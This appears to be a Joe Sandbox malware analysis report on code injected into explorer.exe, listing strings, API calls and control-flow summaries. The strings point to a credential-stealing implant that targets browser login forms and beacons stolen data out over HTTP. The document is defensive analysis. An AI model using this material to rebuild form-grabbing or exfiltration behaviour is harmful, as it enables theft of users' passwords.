                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                      • ExecuteOptions, xrefs: 011346A0
                                                      • Execute=1, xrefs: 01134713
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                      • RTL: Re-Waiting, xrefs: 0113031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 01137B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                      • RTL: Re-Waiting, xrefs: 01137BAC
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 011372A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                      • RTL: Re-Waiting, xrefs: 011372C1
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0114CFBD
                                                      Strings
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779

                                                      Execution Graph

                                                      Execution Coverage: 2.3%
                                                      Dynamic/Decrypted Code Coverage: 0%
                                                      Signature Coverage: 4.7%
                                                      Total number of Nodes: 444
                                                      Total number of Limit Nodes: 16
execution_graph (rendered call graph; the raw node/edge list is summarized here). Routines in the 10E30000 region of the explorer dump that reach an API call:
• 10eac8c2 and 10ead382 (via 10ead232): ObtainUserAgentString
• 10eb1232 (NtCreateFile at 10eb1410), and the callers 10ea7082, 10ea6f52, 10ea7432, 10eab352, 10eab602 and 10eab792 that route into it: NtCreateFile
• 10eb0ab2, 10ea68f2 and 10eb2e12 (NtProtectVirtualMemory at 10eb2e45): NtProtectVirtualMemory, issued in runs of up to four consecutive calls from 10ea9ee2, 10ea9fc2, 10eaa102, 10eaa2f2, 10eaa712 and 10eb2bac; each run ends with a call to 10ead382 (ObtainUserAgentString)
• 10ea8b72 / 10ea8b66: CreateMutexW at 10ea8cb5
• 10ea6412: CreateThread at 10ea644d
• 10ea62dd: SleepEx loop at 10ea6328 that calls out to 10eb0f12 (7 API calls), 10ea7432 (NtCreateFile) and 10ea60f2
• 10eb1f82 (also entered via 10eb1f7a): socket (10eae5b2), getaddrinfo (10eb2117), connect (10eae732), send (10eae6b2), setsockopt and recv (10eb27f4); the graph tags it "6 API calls" where it is reached indirectly from 10ea6012, 10ea60f2, 10eac662, 10eae0c2, 10eb0842 and 10eb0922
The remaining roots (10eb3aa9, 10eb39b3, 10eb39f1, 10eb3a1f, 10eb3a4d, 10eae2e4, 10eab14a, 10eabce2 and others) make no API call of their own and only dispatch into the routines above.

                                                      Control-flow Graph

control_flow_graph (rendered graph; basic-block list summarized, the executed/not-executed colouring is not recoverable here): function 10eb1f82-10eb290c, the network routine. Argument checks at 10eb1f82-10eb2035 lead to socket creation via 10eae5b2 at 10eb2068, a call to 10eb1942 at 10eb20ba, name resolution with getaddrinfo at 10eb2117, a call to 10eae552 at 10eb2167 and connect via 10eae732 at 10eb2191. The output buffer is then built at 10eb2283-10eb26ad by repeated calls to 10eb3262 and 10eb3002 together with 10eb2d62, 10eb2d92, 10eaf482, 10eaee72 and 10eaf042. It is either sent via 10eae6b2 at 10eb26ff or handed to 10eae382/10eae7b2 at 10eb26b5; after the send, setsockopt and recv run at 10eb27f4-10eb2861 inside a loop over 10eb2863-10eb28a1, and 10eae7b2 is called once more at 10eb28aa before the common exit at 10eb28e6-10eb290c. Every failure check in the routine jumps to that exit.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: getaddrinforecvsetsockopt
                                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                      • API String ID: 1564272048-1117930895
                                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                      • Instruction ID: eba317130879438da1b9113c009d5fe04a43d1205d431e4f41866bc890177222
                                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                      • Instruction Fuzzy Hash: E7529E30618B488BCB59EF69C4857EAB7E1FF58304F50462ED4AFCB156DE30A949CB81

                                                      Control-flow Graph

control_flow_graph (rendered graph; basic-block list summarized, the executed/not-executed colouring is not recoverable here): function 10eb1232-10eb18cd. Argument checks at 10eb1232-10eb12cf optionally call 10eb1942 (10eb12d1-10eb12f7); 10eb130d-10eb13dc prepares the call, with further 10eb1942 calls at 10eb133d, 10eb13aa and 10eb13de; NtCreateFile is issued at 10eb1410-10eb1458 and followed by a call to 10eb1172. After the result checks at 10eb145d-10eb148d a comparison chain at 10eb14f2-10eb17d4 dispatches into per-case blocks (10eb1500, 10eb1567, 10eb161f, 10eb16bd, 10eb1742, 10eb17cd, 10eb17fc), each preceded by its own 10eb1942 call; one case (10eb1657-10eb166b) calls 10eb2e92. Exits converge on 10eb1378/10eb137a-10eb13a0, 10eb1604-10eb1611, 10eb1894-10eb18a9 and 10eb18ae-10eb18b8 before the epilogue 10eb18bd-10eb18cd.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: `
                                                      • API String ID: 823142352-2679148245
                                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                      • Instruction ID: 2fb488e0ba75e1b70d5997f7ed582e19439af1de33737eda37af5ad463595a19
                                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                      • Instruction Fuzzy Hash: 5E226970A18B499FCB99DF28C4957AAF7E1FB98314F91026EE05ED3650DB30E851CB81

                                                      Control-flow Graph

control_flow_graph (rendered graph; basic-block list summarized, the executed/not-executed colouring is not recoverable here): function 10eb2e12-10eb2e8f. Prologue 10eb2e12-10eb2e38, an optional call to 10eb1942 at 10eb2e40, NtProtectVirtualMemory at 10eb2e45-10eb2e6e, then one of two exits, 10eb2e70-10eb2e7c or 10eb2e7d-10eb2e8f. As in the NtCreateFile routine at 10eb1232 and the CreateMutexW routine at 10ea8b66, the helper 10eb1942 sits on the path into the API call; the report does not resolve what it does.
                                                      APIs
                                                      • NtProtectVirtualMemory.NTDLL ref: 10EB2E67
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2706961497-0
                                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                      • Instruction ID: 1322bd0f9abb111dc0d16461814fd1db2bf6bde681bc1ca56d6868a904ecfc49
                                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                      • Instruction Fuzzy Hash: 26017134668B884F9B88EF6CE48522AB7E4FBDD315F000B3EE99AC7254EB74D5414742

                                                      Control-flow Graph

control_flow_graph (rendered graph; basic-block list summarized, the executed/not-executed colouring is not recoverable here): function 10eb2e0a-10eb2e8f, an alternate entry to the routine above. A single block 10eb2e0a-10eb2e6e calls 10eb1942 and then NtProtectVirtualMemory, followed by the same two exits, 10eb2e70-10eb2e7c or 10eb2e7d-10eb2e8f.
                                                      APIs
                                                      • NtProtectVirtualMemory.NTDLL ref: 10EB2E67
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2706961497-0
                                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                      • Instruction ID: fd8085a7a7a7dc9427788f5e877f2976b80ab975a506bca1a38baf5597b6d75b
                                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                      • Instruction Fuzzy Hash: E501A234628B884B8B48EB2C94512A6B3E5FBCE314F400B7EE9DAC3250DB21D5024782

                                                      Control-flow Graph

                                                      APIs
                                                      • ObtainUserAgentString.URLMON ref: 10EAC9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 2681117516-319646191
                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction ID: 614393ad8b494c45e5876af2d4d2d6c1a449bc8778c477cd2e4407d8ce02a8fb
                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction Fuzzy Hash: 4D31F231614A4D8FCB45EFA9C8857EEBBE1FF98214F40422AE84ED7240DF789645C789

                                                      Control-flow Graph

                                                      APIs
                                                      • ObtainUserAgentString.URLMON ref: 10EAC9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID: .dll$el32$kern

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID: .dll$el32$kern

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: connect
                                                      • String ID: conn$ect

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: connect
                                                      • String ID: conn$ect

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: send

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: sock

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$e$n$v
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4$\$dll$ion.$vers
                                                      • API String ID: 0-1610437797
                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                      • Instruction ID: 4c5e68525aa5ad8aeb403eaaa9e0e817c9423717f5701872e3e543076aaf1e2f
                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                      • Instruction Fuzzy Hash: 08416F71258B488BCBB9EF6498557EBB3E4FB98301F40462E999EC7240EF30D9458782
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                      • API String ID: 0-327345718
                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                      • Instruction ID: 5489327073478170e5c8c71561902b38919415493901597195c74272792b7a26
                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                      • Instruction Fuzzy Hash: 5B4181B1A19E0D8FEB98EF5881943EEB3E1FB68300F40456E980AD3210DA71D9808B85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$el32$h$kern
                                                      • API String ID: 0-4264704552
                                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                      • Instruction ID: 71ff8ac9723103c4b1cfe3848c66fc4c5ab925dacacc9dd455278fa05d9fef5a
                                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                      • Instruction Fuzzy Hash: 4B4181B0608B4C8FD7A9DF2881883AAB7F1FB98341F104A3E959EC3255EB70D945CB41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $Snif$f fr$om:
                                                      • API String ID: 0-3434893486
                                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                      • Instruction ID: 05ef8505565722457db4f3891757df6025b2247a7ccafffc13403f18d94ebcaf
                                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                      • Instruction Fuzzy Hash: 1B31D332509B885FC72ADB68D4846DBB7D4FB94300F904D1ED89BC7351EE31A94ACB42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $Snif$f fr$om:
                                                      • API String ID: 0-3434893486
                                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                      • Instruction ID: 10c601c976f885047d9d9f69ecee6ee314b5e73354b42fd8278069a800e9a5a5
                                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                      • Instruction Fuzzy Hash: 6831E072508B486FD729EB28C4846EBB7D4FB94300F804D1EE89BC7351EE30A906CB42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$chro$hild$me_c
                                                      • API String ID: 0-3136806129
                                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                      • Instruction ID: bfc236a6df0b4b7654b3433d244347e551452f18d91b5c30f78ee398c785e9b2
                                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                      • Instruction Fuzzy Hash: 0E315AB1118A088FCB95EF689494BABB7E1FB98300F844A7D984ACB314DF30D905CB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$chro$hild$me_c
                                                      • API String ID: 0-3136806129
                                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                      • Instruction ID: bb4fbb63c5ab834c9df7251fa7b3f774fa16fbb4bbd1ac9d86228ed344bf9c2e
                                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                      • Instruction Fuzzy Hash: D3316AB1118A088FCB94EF689494BABB7E1FB98300F844A3D984ACB354DF30D905CB42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 0-319646191
                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction ID: eeff5456f5826c3e398a177fef9cee9df6c1ab128c00f30107b075e83ca5a1b8
                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction Fuzzy Hash: F531FF72610A0C8BCB54EFA8D8887EEB7E1FF58214F40062AD84ED7340DF789A45C789
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 0-319646191
                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                      • Instruction ID: 65a65c3133f628935f4f5ef3efefb69240aac2eda352b2117e955a3549ce2daa
                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                      • Instruction Fuzzy Hash: CC21D572610A0D8FCB54EFA8D8447EEBBE1FF58204F80462AD85AD7340DF749A45C795
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$l$l$t
                                                      • API String ID: 0-168566397
                                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                      • Instruction ID: 3394851b0dd5c650220ad1fb376ddebf2a5da8480ddd7dc6bc2052f12f0212d1
                                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                      • Instruction Fuzzy Hash: FA217C71A24A0D9BDB58EFA8D4447EEBBF0FB18304F904A2DD449D3700DB759991CB84
                                                      Strings
                                                      Memory Dump Source
